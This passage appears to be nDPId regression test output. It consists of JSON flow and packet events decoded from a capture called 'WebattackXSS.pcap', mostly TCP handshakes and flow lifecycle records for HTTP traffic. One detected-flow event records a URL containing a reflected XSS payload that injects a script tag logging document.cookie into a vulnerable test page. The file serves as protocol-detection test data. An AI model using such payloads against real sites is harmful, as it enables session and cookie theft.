+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1499347291442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88hpAAD4G07WsEAABwKgKMtlQAFCuf9YCAAAAAKACchDbjgAAAgQFtAQCCAoBOiQYAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1499347291443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291443,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2VCY8a8grn\/WA6AScSCa6QAAAgQFtAQCCAoD4\/WOATokGAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1499347291443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347291443,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08htAAD4G07ysEAABwKgKMtlQAFCuf9YDmPGvIYAQAOU58QAAAQEICgE6JBgD4\/WO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347292725,"flow_last_seen":1499347292725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292725,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347295224,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347295224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":3,"flow_last_seen":1499347296463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347296463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TjFAAD4Gd6esEAABwKgKMtmGAFCTXWbPiajecYAQAOWaPAAAAQEICgE6KP8D4\/p1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347297732,"flow_last_seen":1499347297732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347297732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1499347297732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LW1AAD4GmGOsEAABwKgKMtmUAFB7SgdRAAAAAKACchDXDQAAAgQFtAQCCAoBOio8AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1499347297733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ZST\/kF5e0oHUqAScSAC3wAAAgQFtAQCCAoD4\/uyAToqPAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1499347297733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347297733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LW5AAD4GmGqsEAABwKgKMtmUAFB7SgdSk\/5BeoAQAOWh5gAAAQEICgE6KjwD4\/uy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347300263,"flow_last_seen":1499347300263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347300263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1499347300263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bohAAD4GV0isEAABwKgKMtmuAFBvk0I9AAAAAKACchClRQAAAgQFtAQCCAoBOiy1AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1499347300263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2a7Gy0E5b5NCPqAScSCcEAAAAgQFtAQCCAoD4\/4rATostQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1499347300264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347300264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bolAAD4GV0+sEAABwKgKMtmuAFBvk0I+xstBOoAQAOU7GAAAAQEICgE6LLUD4\/4r"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347301520,"flow_last_seen":1499347301520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347301520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1499347301520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80Q9AAD4G9MCsEAABwKgKMtm8AFCdpvzgAAAAAKACchC7RgAAAgQFtAQCCAoBOi3vAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1499347301520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2bw9W3Mnnab84aAScSAIWgAAAgQFtAQCCAoD4\/9lATot7wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2784,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1499347301521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347301521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00RBAAD4G9MesEAABwKgKMtm8AFCdpvzhPVtzKIAQAOWnYQAAAQEICgE6Le8D4\/9l"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 